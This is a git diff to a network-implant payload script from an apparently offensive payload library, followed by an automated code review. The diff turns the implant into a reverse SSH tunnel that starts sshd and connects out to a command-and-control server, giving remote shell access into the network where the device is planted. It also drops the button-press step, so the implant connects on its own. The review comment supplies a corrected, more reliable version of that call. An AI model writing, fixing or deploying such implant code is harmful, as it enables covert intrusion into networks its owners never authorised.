diff --git a/payloads/library/remote-access/SSH-remote-access/payload.sh b/payloads/library/remote-access/SSH-remote-access/payload.sh
index a400968..76374ca 100644
--- a/payloads/library/remote-access/SSH-remote-access/payload.sh
+++ b/payloads/library/remote-access/SSH-remote-access/payload.sh
@@ -7,38 +7,58 @@
 # Net Mode: NAT
 # Firmware: 1.2
 #
-#
 # LED State Descriptions
 # Magenta Solid - SSH connecting
-# Amber Blink 5 Times - Waiting for user button press
+# Blue - SSH connection successful
 #
 # C2 Server address, port and tunnel port
-c2_server="192.168.1.123"
-c2_port=22
+c2_server="192.168.1.145"
 c2_tunnel_port=2222
 tunnel_user="username" # no pass needed, headless mode required so RSA key file is used.
 # generate in this directory with: 'ssh -t rsa -b 2048 -f id_rsa'
+# waiting for button press to start SSH connection.
+#BUTTON
+#
+
+# Magenta indicates SSH connection is launching and the server should have received the connection.
+LED SETUP
+
+echo -e "SETUP Phase\n" >> /root/payloads/switch3/debug.txt
+
 # we need an IP, so it'll have to be NAT, unless implanted inline.
 NETMODE NAT
+sleep 8
-# amber blinking for button press to launch SSH connection.
-LED A BLINK
-# waiting for button press to start SSH connection.
-BUTTON
-# Green indicates SSH connection has been launched and the server should have received the connection.
-LED M SOLID
+# debug
+#echo -e "NAT configured.\n" $(ifconfig) >> /root/payloads/switch3/debug.txt
-# -L indicates local port forwarding which tunnels connections to localhost on server to client.
+# fix file permission problems
+# chmod 600 id_rsa
+
+# -R indicates remote port forwarding which tunnels connections to localhost on server to client.
 # Once complete, connect to remote SSH server and connect to the squirrel by connecting to localhost at
 # the tunnel port specified on the server to reach the Squirrel.
+#
+# default port is 22
+echo -e "Connecting to Server.\n" >> /root/payloads/switch3/debug.txt
-# todo: push SSH connection to background to support button kill switch, create optional SSH connection keep-alive.
-ssh -L 22:127.0.0.1:$c2_tunnel_port -i id_rsa -p $c2_port $tunnel_user@$c2_server &
+echo -e "starting server.\n" >> /root/payloads/switch3/debug.txt
+service sshd start
+sleep 3
-# SSH connection failed, target network may be hardened.
-LED R
-NETMODE OFF
-LED FINISH
\ No newline at end of file
+ssh -R $c2_tunnel_port:127.0.0.1:22 -i /root/payloads/switch3/id_rsa $tunnel_user@$c2_server
+# echo $ssh_out >> /root/payloads/switch3/debug.txt
+# ssh_pid=$!
+
+echo -e "Server Connected.\n" >> /root/payloads/switch3/debug.txt
+
+LED ATTACK
+# WARNING: Initial SSH connection must be manual, since c2_server may not be included in trusted_hosts file
+# SSH will prompt for verification, and to add host to trusted hosts file.
+
+#BUTTON 365d && {
+# kill $ssh_pid
+#}
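Review bot: The new `ssh -R` call runs in the foreground with no exit-status check, so the `echo -e "Server Connected.\n"` and `LED ATTACK` lines after it execute only once ssh has exited, and they run whether the connection succeeded or was refused; the old failure path (`LED R` / `NETMODE OFF`) has been dropped without a replacement. Attach the failure branch to the call and quote the expansions: `ssh -R "$c2_tunnel_port:127.0.0.1:22" -i /root/payloads/switch3/id_rsa "$tunnel_user@$c2_server" || { LED R; NETMODE OFF; exit 1; }`. The commented-out `ssh_pid=$!` would only hold ssh's PID if the command were backgrounded with `&`, which it no longer is, so the kill-switch sketch at the end cannot work as written. The header's `# Blue - SSH connection successful` is therefore misleading as well, since the LED is set only after the session ends. The context comment `'ssh -t rsa -b 2048 -f id_rsa'` names the wrong tool; `ssh-keygen -t rsa -b 2048 -f id_rsa` is what generates the key pair.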